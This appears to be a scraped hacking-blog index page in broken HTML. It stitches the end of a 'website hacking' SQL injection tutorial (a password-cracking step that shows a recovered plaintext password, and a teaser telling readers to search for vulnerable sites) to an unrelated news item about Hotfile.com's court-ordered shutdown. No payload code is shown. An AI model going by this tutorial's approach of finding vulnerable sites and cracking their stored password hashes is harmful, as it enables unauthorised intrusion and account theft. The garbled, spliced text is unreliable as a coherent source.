<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfNOa9MBcuCsdmASH8B3Kg0DX88aGEYeJ7uA_5-q44UAKHLY2wahp2hQoPkUqCu5hYGP-Vp086pfL4j7jzlDiwue9jPi4PYA39_1SVVcFODvy7XNgYXjqSNJ6i-LC7yvisxBWgxv2dnws/s1600/SQL+copy.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfNOa9MBcuCsdmASH8B3Kg0DX88aGEYeJ7uA_5-q44UAKHLY2wahp2hQoPkUqCu5hYGP-Vp086pfL4j7jzlDiwue9jPi4PYA39_1SVVcFODvy7XNgYXjqSNJ6i-LC7yvisxBWgxv2dnws/s400/SQL+copy.png" width="400" /></a></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
10)Cracking the password :</div>
<div>
=====================</div>
<div>
</div>
<div>
Because the password is in md5 hash we need to crack it.</div>
<div>
Passwords recovery – MD5, SHA1, MySQL</div>
<div>
pass</div>
<div>
: x1R0zYB3bex</div>
<div>
<br /></div>
</div>
</div>

Website Hacking Using Sql Injection Maunal

Website Hacking Using Sql Injection Maunal 1). Search for a vulnerable site. ======================= Highlight one then press...

+ Read more »

Hotfile.com Is Permanently Shutdown By US Federal Court

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: Helvetica, Arial, sans-serif; font-size: 12px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7BFWcdsK7lbwji7QZxL5Dl2zPZsRvkcRys696M8Y-48JDdAVq4DhdbqFKy6P2cln02jhObFlWxNYq4B4F9AnvhCEM2jcbeEWIF9BZxH9zQUajajbaGSNA-_9tJCExdX0-aoBzhIBTdVMW/s1600/Hotfile+dot+com.png" imageanchor="1" style="border: none; clear: left; color: #f79100; float: left; list-style: none; margin: 0px 1em 1em 0px; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7BFWcdsK7lbwji7QZxL5Dl2zPZsRvkcRys696M8Y-48JDdAVq4DhdbqFKy6P2cln02jhObFlWxNYq4B4F9AnvhCEM2jcbeEWIF9BZxH9zQUajajbaGSNA-_9tJCExdX0-aoBzhIBTdVMW/s640/Hotfile+dot+com.png" style="border: none; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;" width="640" /></a></div>
<span style="background-color: white; border: none; color: #666666; font-family: Georgia, 'Times New Roman', serif; font-size: 12px; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px;"><br /></span><span style="background-color: white; color: #666666; font-family: Helvetica, Arial, sans-serif; font-size: 12px; line-height: 20px;"></span><span style="background-color: white; border: none; color: #666666; font-family: Georgia, 'Times New Roman', serif; font-size: 12px; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px;">Top sharing website Hotfile.com has been shutdown due to Copyright. Hotfile is agrees to pay $80 million to movie studios and ceased all operation. It was founded by Hotfile Corp in 2006, its allowed users to upload and download files with any web browser. Non-registered users were allowed to upload up to 400 MB.</span><br style="background-color: white; color: #666666; font-family: Helvetica, Arial, sans-serif; font-size: 12px; line-height: 20px;" /><span style="background-color: white; border: none; color: #666666; font-family: Georgia, 'Times New Roman', serif; font-size: 12px; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px;">Now when you open Hotfile.com then it a message on home page, </span><br style="background-color: white; color: #666666; font-family: Helvetica, Arial, sans-serif; font-size: 12px; line-height: 20px;" /><span style="border: none; color: #666666; font-family: Georgia, 'Times New Roman', serif; font-size: 12px; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px;"><span style="background-color: white;">"As a result of a US federal court having found </span><a href="http://hotfile.com/" style="background-color: white;">Hotfile.com</a><span style="background-color: white;"> to in violation of copyright law, the site has been permanently shutdown."</span></span></div>

Hotfile.com Is Permanently Shutdown By US Federal Court

Top sharing website Hotfile.com has been shutdown due to Copyright. Hotfile is agrees to pay $80 million to movie studios and ceased all ...

+ Read more »